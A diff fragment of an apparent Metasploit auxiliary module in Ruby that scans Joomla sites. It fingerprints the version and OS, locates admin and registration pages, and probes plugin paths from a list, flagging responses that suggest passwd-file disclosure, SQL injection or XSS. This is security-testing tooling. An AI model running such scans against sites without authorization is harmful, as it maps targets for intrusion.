+				'language/en-GB/en-GB.ini','htaccess.txt', 'language/en-GB/en-GB.com_media.ini']
+		iapps = ['robots.txt','administrator/index.php','/admin/','index.php/using-joomla/extensions/components/users-component/registration-form',
+				'index.php/component/users/?view=registration','htaccess.txt']
+		print_status("Checking Host: #{ip} for version information")
+		apps.each do |app|
+			break if check_app(tpath,app,ip)
+			end
+		print_status("Scanning for interesting pages")
+		iapps.each do |iapp|
+			scan_pages(tpath,iapp,ip)
+			end
+		if datastore['ENUMERATE']
+		print_status("Scanning for plugins")
+		bres = send_request_cgi({
+			'uri' => tpath,
+			'method' => 'GET',
+			}, 5)
+		return if not bres or not bres.body or not bres.code
+		bres.body.gsub!(/[\r|\n]/, ' ')
+			File.open(datastore['PLUGINS'], 'rb').each_line do |bapp|
+			papp = bapp.chomp
+			plugin_search(tpath,papp,ip,bres)
+			end
+			end
+
+		end
+	def check_app(tpath, app, ip)
+		res = send_request_cgi({
+				'uri' => tpath+app,
+				'method' => 'GET',
+				}, 5)
+		return if not res or not res.body or not res.code
+		res.body.gsub!(/[\r|\n]/, ' ')
+		os = osfingerprint(res)
+		if (res.code.to_i == 200)
+			out = fingerprint(res,app)
+			return if not out
+			if(out =~ /Unknown Joomla/)
+				print_error("Unable to identify Joomla Version with this file #{app}")
+				return false
+			else
+				print_good("Joomla Version:#{out} from: #{app} ")
+				print_good("OS: #{os}")
+				report_note(
+					:host  => ip,
+					:port  => datastore['RPORT'],
+					:proto => 'http',
+					:ntype => 'Joomla Version',
+					:data  => out
+				)
+				return true
+			end
+		elsif(res.code.to_i == 403 and datastore['VERBOSE'])
+			if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
+				print_status("#{ip} denied access to #{url} (SSL Required)")
+			elsif(res.body =~ /has a list of IP addresses that are not allowed/)
+				print_status("#{ip} restricted access by IP")
+			elsif(res.body =~ /SSL client certificate is required/)
+				print_status("#{ip} requires a SSL client certificate")
+			else
+				print_status("#{ip} denied access to #{url} #{res.code} #{res.message}")
+			end
+
+		end
+	rescue OpenSSL::SSL::SSLError
+	rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
+	rescue ::Timeout::Error, ::Errno::EPIPE
+	end
+	def scan_pages(tpath,iapp, ip)
+		res = send_request_cgi({
+				'uri' => tpath+iapp,
+				'method' => 'GET',
+				}, 5)
+		return if not res or not res.body or not res.code
+		res.body.gsub!(/[\r|\n]/, ' ')
+		if (res.code.to_i == 200)
+			if(res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/)
+				sout = "Administrator Login Page"
+			elsif(res.body =~/Registration/ and res.body =~/class="validate">Register<\/button>/)
+				sout = "Registration Page"
+			else
+				sout = iapp
+			end
+			return if not sout
+			if(sout == iapp)
+				print_good("#{iapp}")
+			elsif print_good("#{sout}: #{iapp}  ")
+				report_note(
+					:host  => ip,
+					:port  => datastore['RPORT'],
+					:proto => 'http',
+					:ntype => 'Joomla Pages',
+					:data  => sout
+				)
+			end
+		elsif(res.code.to_i == 403 and datastore['VERBOSE'])
+			if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
+				print_status("#{ip} denied access to #{url} (SSL Required)")
+			elsif(res.body =~ /has a list of IP addresses that are not allowed/)
+				print_status("#{ip} restricted access by IP")
+			elsif(res.body =~ /SSL client certificate is required/)
+				print_status("#{ip} requires a SSL client certificate")
+			else
+				print_status("#{ip} denied access to #{url} #{res.code} #{res.message}")
+			end
+		end
+	rescue OpenSSL::SSL::SSLError
+	rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
+	rescue ::Timeout::Error, ::Errno::EPIPE
+	end
+	def plugin_search(tpath,papp, ip, bres)
+		res = send_request_cgi({
+				'uri' => tpath+papp,
+				'method' => 'GET',
+				}, 5)
+		return if not res or not res.body or not res.code
+		res.body.gsub!(/[\r|\n]/, ' ')
+		osize = bres.body.size
+		nsize = res.body.size
+		if (res.code.to_i == 200 and res.body !~/#404 Component not found/ and res.body !~/<h1>Joomla! Administration Login<\/h1>/ and osize != nsize)
+			print_good("Found Plugin: #{papp} ")
+			if (papp =~/passwd/ and res.body !~/root/)
+						print_error("\tPasswd not found")
+			elsif(papp =~/passwd/ and res.body =~/root/)
+					print_good("\tPasswd file found in response")
+			elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body =~/SQL syntax/)
+					print_good("\tPossible SQL Injection")
+			elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body !~/SQL syntax/)
+					print_error("\tUnable to identify SQL injection")
+			elsif(papp =~/>alert/ and res.body !~/>alert/)
+				print_error("\tNo XSS")
+			elsif(papp =~/>alert/ and res.body =~/>alert/)
+				print_good("\tPossible XSS")
+			elsif(res.body =~/SQL syntax/ )
+				print_error("\tPossible SQL Injection")
+			elsif(papp =~/com_/)
+			blah = papp.split('_')
+			blah1 = blah[1].gsub('/','')
+			res1 = send_request_cgi({
+				'uri' => tpath+"index.php?option=com_#{blah1}",
+				'method' => 'GET',
+				}, 5)
+				if (res1.code.to_i == 200)
+			print_status("\tFound_page: index.php?option=com_#{blah1}")
+				end
+				end
+				report_note(
+					:host  => ip,
+					:port  => datastore['RPORT'],
+					:proto => 'http',
+					:ntype => 'Plugin Found',
+					:data  => papp
+				)
+		elsif(res.code.to_i == 403 and datastore['VERBOSE'])
+			if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
+				print_status("#{ip} denied access to #{url} (SSL Required)")
+			elsif(res.body =~ /has a list of IP addresses that are not allowed/)
+				print_status("#{ip} restricted access by IP")
+			elsif(res.body =~ /SSL client certificate is required/)
+				print_status("#{ip} requires a SSL client certificate")
+			else
+				print_status("#{ip} denied access to #{url} #{res.code} #{res.message}")
+			end
+		end
+
+	rescue OpenSSL::SSL::SSLError
+	rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
+	rescue ::Timeout::Error, ::Errno::EPIPE
+	end
+
+
+
+end